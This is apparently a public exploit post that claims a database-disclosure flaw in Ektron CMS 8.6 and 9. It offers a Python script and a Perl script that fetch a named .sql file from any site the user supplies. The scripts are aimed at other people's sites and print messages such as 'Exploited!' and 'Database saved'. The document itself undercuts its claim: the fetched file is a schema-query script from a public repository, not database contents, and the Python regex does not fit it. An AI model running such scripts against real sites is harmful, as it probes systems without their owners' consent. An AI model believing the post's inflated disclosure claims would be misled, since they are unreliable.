########################################################################### # Exploit Title : Ektron CMS 9 Database Disclosure Exploit # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 02/04/2019 # Vendor Homepage : ektron.com episerver.com/products/platform/ektron/ # Software Download Link : github.com/whanrott/Ektron_sql_scripts/archive/master.zip # Software Information Link : ektron.com/Products/Web-CMS/Web-Content-Management/ github.com/whanrott/Ektron_sql_scripts cmsmatrix.org/matrix/cms-matrix/ektron-cms # Software Affected Versions : 8.6 and 9 # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Vulnerability Type : CWE-200 [ Information Exposure ] CWE-538 [ File and Directory Information Exposure ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos ########################################################################### # Description about Software : *************************** Ektron Web Content Management System (CMS) is the platform of choice for more than 3,700 global companies. Episerver Digital Experience Cloud™ The only platform that puts Digital Content, Commerce and Marketing in one screen. Create, deploy, and manage enterprise-scale, global, personalized websites. Empower users, designers, and developers to work in parallel, speeding time-to-web. Make content updates directly on the site using an intuitive browser-based editor. Create site wireframes, ensuring global brand consistency. Speed development using Ektron's Framework API, pre-built .NET controls, and standard development tools like Microsoft Visual Studio. ########################################################################### # Impact : *********** * The product stores sensitive information in files or directories that are accessible to actors outside of the intended control sphere. * An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information. * This information is highly sensitive and should not be found on a production system. Information : ************* Ektron SQL Scripts : Simple SQL scripts for examining the database of Ektron CMS v9. Scripts Script Name Purpose find_all_users.sql List all users with last login date find_content_and_folder.sql List all content, showing folder. Filter by multiple criteria find_content_history.sql Show content item history find_database_column_names.sql query the database structure to find matching tables and column names find_folder_permissions.sql List folder permissions ########################################################################### Files : ***** /find_all_users.sql /find_content_alias_and_template.sql /find_content_and_folder.sql /find_content_history.sql /find_database_column_names.sql /find_folder_permissions.sql /find_menu_items.sql /find_meta_course_accreditation.sql /find_meta_course_combinations.sql /find_mismatched_content.sql /where_is_this_content_used.sql Information [ find_database_column_names.sql ] ********************************************* /* look for table column names */ --USE ; SELECT TABLE_NAME ,COLUMN_NAME ,DATA_TYPE ,CHARACTER_MAXIMUM_LENGTH FROM INFORMATION_SCHEMA.COLUMNS WHERE -- COLUMN_NAME LIKE '%%' --AND TABLE_NAME LIKE '%_tbl' --AND (TABLE_NAME LIKE '%%' OR COLUMN_NAME LIKE '%template%') --AND ( COLUMN_NAME LIKE '%%' OR TABLE_NAME LIKE '%%' ) AND COLUMN_NAME LIKE '%%' AND TABLE_NAME NOT LIKE '%_tracking' ORDER BY TABLE_NAME, COLUMN_NAME ; ########################################################################### # Database Disclosure Information Exposure Exploit 1 : *********************************************** #!/usr/bin/python import string import re from urllib2 import Request, urlopen disc = "/find_database_column_names.sql" url = raw_input ("URL: ") req = Request(url+disc) rta = urlopen(req) print "Result" html = rta.read() rdo = str(re.findall("resources.*=*", html)) print rdo exit ########################################################################### # Database Disclosure Information Exposure Exploit 2 : *********************************************** #!/usr/bin/perl -w # Author : KingSkrupellos # Team : Cyberizm Digital Security Army use LWP::Simple; use LWP::UserAgent; system('cls'); system('Ektron CMS V.9 Database Disclosure Exploit'); system('color a'); if(@ARGV < 2) { print "[-]How To Use\n\n"; &help; exit(); } sub help() { print "[+] usage1 : perl $0 site.com /path/ \n"; print "[+] usage2 : perl $0 localhost / \n"; } ($TargetIP, $path, $File,) = @ARGV; $File="find_database_column_names.sql"; my $url = "http://" . $TargetIP . $path . $File; print "\n Wait Please Dear Hacker!!! \n\n"; my $useragent = LWP::UserAgent->new(); my $request = $useragent->get($url,":content_file" => "D:/find_database_column_names.sql"); if ($request->is_success) { print "[+] $url Exploited!\n\n"; print "[+] Database saved to D:/find_database_column_names.sql\n"; exit(); } else { print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n"; exit(); } ########################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ###########################################################################